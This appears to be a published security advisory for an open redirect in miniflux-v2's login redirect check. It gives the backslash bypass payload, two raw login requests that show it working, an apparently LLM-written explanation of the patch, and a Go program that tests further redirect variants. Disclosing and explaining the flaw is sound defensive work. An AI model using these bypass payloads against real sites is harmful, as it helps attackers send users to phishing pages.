VYPR
Medium severity 5.1 · NVD Advisory · Published Jun 19, 2026 · Updated Jun 19, 2026

Open Redirect Bypass in miniflux-v2

CVE-2026-55185

Description

Summary

The URL restrictions in miniflux-v2 can be bypassed by attackers, leading to an open redirect vulnerability.

Details

The redirect URL supplied at login is validated by IsRelativePath.

That check enforces several restrictions: the value must be a relative path, it must not carry a host or a scheme, and protocol-relative inputs such as //fushuling.com are rejected. These restrictions can still be bypassed.

For a proof-of-concept (PoC) value like /\fushuling.com, Go's URL parser finds neither a host nor a netloc, and the string does not start with //, so the check accepts it. When the browser follows the redirect, however, it treats the backslash as a forward slash, reads //fushuling.com as a scheme-relative URL and navigates to the external address https://fushuling.com, bypassing the existing protection.

For a value like //fushuling.com, the existing logic detects the external target and falls back to /unread, which prevents the attack.

POST /login HTTP/1.1
Host: 127.0.0.1:8081
Content-Length: 92
Cache-Control: max-age=0
sec-ch-ua: "Not(A:Brand";v="24", "Chromium";v="122"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.57 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: cw_conversation=eyJhbGciOiJIUzI1NiJ9.eyJzb3VyY2VfaWQiOiI1NTlhZGZkNS0wMTMxLTRjOWUtYjJmMi1kZTQ4YzFmMzUwODMiLCJpbmJveF9pZCI6NTI3NTUsImV4cCI6MTc5MTk3MzU4OCwiaWF0IjoxNzc2NDIxNTg4fQ._8EAAv62saWBzO54yUJCbASbjbrNdMsYEC49blqJwQM; casdoor_session_id=cc333aee41d646565c1bde0bba532991; SSID=EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE.KKPgzj5eEsDglYQXFeERpo7F97-phtpOsQL0Sh9e_EA; sid=Q5hex9PpdqFKeVL41zT4W9DqyBnMJhVO; MinifluxSessionID=F5GAIDVFDZVTOTOWBLWKXCRNIE.HUQLKF4BMK42KUAM3N2VK4MA45
Connection: close

csrf=CYJ2SHTG7AYLMFW6TMTLRR4K54&redirect_url=//fushuling.com&username=admin&password=test123

When the attacker instead supplied the redirect URL as /\fushuling.com, the value passed the check and the server set the Location header to /\fushuling.com.

POST /login HTTP/1.1
Host: 127.0.0.1:8081
Content-Length: 92
Cache-Control: max-age=0
sec-ch-ua: "Not(A:Brand";v="24", "Chromium";v="122"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.57 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: cw_conversation=eyJhbGciOiJIUzI1NiJ9.eyJzb3VyY2VfaWQiOiI1NTlhZGZkNS0wMTMxLTRjOWUtYjJmMi1kZTQ4YzFmMzUwODMiLCJpbmJveF9pZCI6NTI3NTUsImV4cCI6MTc5MTk3MzU4OCwiaWF0IjoxNzc2NDIxNTg4fQ._8EAAv62saWBzO54yUJCbASbjbrNdMsYEC49blqJwQM; casdoor_session_id=cc333aee41d646565c1bde0bba532991; SSID=EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE.KKPgzj5eEsDglYQXFeERpo7F97-phtpOsQL0Sh9e_EA; sid=Q5hex9PpdqFKeVL41zT4W9DqyBnMJhVO; MinifluxSessionID=54R3C5MYFRCW7JVL2WUP5GFW4Z.3FLK5B4S7R3O6ZRACB7A3B2RG5
Connection: close

csrf=QC7PJNLRRDHSF6OZPXFVPKAXEO&redirect_url=/\fushuling.com&username=admin&password=test123

When the browser followed that Location header it landed on https://fushuling.com, so the restriction was bypassed and an open redirect achieved.

PoC

/\fushuling.com

Impact

Open Redirect

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability mechanics

Root cause

"Missing input validation for backslashes in the relative path check allows browser normalization to convert a seemingly relative path into an external redirect."

Attack vector

An attacker sends a crafted POST request to the `/login` endpoint with a `redirect_url` parameter containing a backslash, such as `/\fushuling.com`. Go's `url.Parse` interprets this as a relative path (no host or scheme), so the existing `IsRelativePath` check passes. The browser, however, normalizes the backslash to a forward slash, turning the target into `//fushuling.com`, which it resolves as a scheme-relative URL pointing at an external host. This bypasses the security measures and achieves an open redirect. [ref_id=1]

Affected code

The vulnerability resides in the `IsRelativePath` function in `internal/urllib/url.go`, which validates redirect URLs during login and other redirect flows. The function did not reject backslashes, so an attacker could supply a payload like `/\fushuling.com` that Go's `url.Parse` treats as a relative path but that browsers normalize to `//fushuling.com`, resulting in an open redirect.

What the fix does

The patch adds a check at the top of `IsRelativePath` in `internal/urllib/url.go` that rejects any link containing a backslash (`\`) before the URL is parsed. This closes the discrepancy between Go's URL parser (which treats a backslash as an ordinary path character) and browser behaviour (which normalizes backslashes to forward slashes). The commit message states that this prevents open redirects via payloads like `/\fushuling.com`. [patch_id=6634781]
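The Go program below is an added illustration, not code from miniflux's repository or from the fix commit. It reconstructs the relative-path check as the advisory describes it (the real function may differ in detail), applies the patch's backslash rule to it, and pairs both with a deliberately small model of the one browser rule that matters here: the WHATWG URL parser treats `\` as `/` for http(s) URLs and ignores extra slashes before an authority. The function names `isRelativePathVulnerable`, `isRelativePathFixed`, `browserHost` and `isSafeRedirect`, the page URL and the list of probe values are all assumptions made for the example. It goes one step beyond the PoC by also probing `\\fushuling.com` and `///fushuling.com`, which Go likewise parses as host-less paths.

```go
package main

import (
	"fmt"
	"net/url"
	"strings"
)

// isRelativePathVulnerable reconstructs the pre-fix validation the advisory
// describes (assumption: miniflux's real function may differ in detail): the
// link passes if Go's url.Parse sees no scheme and no host and the raw string
// does not start with "//".
func isRelativePathVulnerable(link string) bool {
	u, err := url.Parse(link)
	if err != nil {
		return false
	}
	return u.Scheme == "" && u.Host == "" && !strings.HasPrefix(link, "//")
}

// isRelativePathFixed applies the rule the patch adds: any link containing a
// backslash is rejected before it reaches url.Parse, then the original check
// runs unchanged.
func isRelativePathFixed(link string) bool {
	if strings.Contains(link, `\`) {
		return false
	}
	return isRelativePathVulnerable(link)
}

// browserHost approximates how a WHATWG-compliant browser resolves a Location
// value against an http(s) page: every backslash is treated as a forward
// slash, and a leading run of slashes introduces a new authority. It returns
// the host the browser would navigate to. This models one rule of the
// browser parser, not the whole parser (assumption).
func browserHost(page *url.URL, location string) string {
	normalized := strings.ReplaceAll(location, `\`, "/")
	if strings.HasPrefix(normalized, "//") {
		// "///host" and "//host" both select an authority in the browser.
		normalized = "//" + strings.TrimLeft(normalized, "/")
	}
	ref, err := url.Parse(normalized)
	if err != nil {
		return ""
	}
	return page.ResolveReference(ref).Host
}

// isSafeRedirect is the stricter check a reviewer would usually prefer to a
// character denylist: resolve the link the way the browser will and require
// that the result stays on the application's own host.
func isSafeRedirect(page *url.URL, link string) bool {
	return isRelativePathFixed(link) && browserHost(page, link) == page.Host
}

func main() {
	// Constructed page URL standing in for the miniflux instance in the PoC.
	page, _ := url.Parse("https://127.0.0.1:8081/login")
	probes := []string{
		"/unread",              // legitimate default target
		"//fushuling.com",      // caught by the original check
		`/\fushuling.com`,      // the advisory's bypass
		`\\fushuling.com`,      // two backslashes, same browser outcome
		"///fushuling.com",     // Go: host-less path; browser: new authority
		"https://fushuling.com", // absolute, caught by the scheme check
	}
	for _, link := range probes {
		fmt.Printf("%-24q vulnerable=%-5v fixed=%-5v browser->%s\n",
			link, isRelativePathVulnerable(link), isRelativePathFixed(link),
			browserHost(page, link))
	}
}
```

The vulnerable check accepts `/\fushuling.com` and `\\fushuling.com` because Go leaves the backslash in the path and reports an empty host, while the browser-side model resolves both to `fushuling.com`; the patched check rejects them. `///fushuling.com` is parsed by Go as a host-less path too and is stopped only by the raw `//` prefix test, which is why `isSafeRedirect` compares the browser-resolved host rather than trusting the parser's view alone.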

Preconditions

  • network: The attacker must be able to submit a login request (or any request that uses the redirect_url parameter) to the miniflux-v2 instance.
  • input: The attacker must craft a redirect_url containing a backslash, e.g., /\fushuling.com.

Generated on Jun 19, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
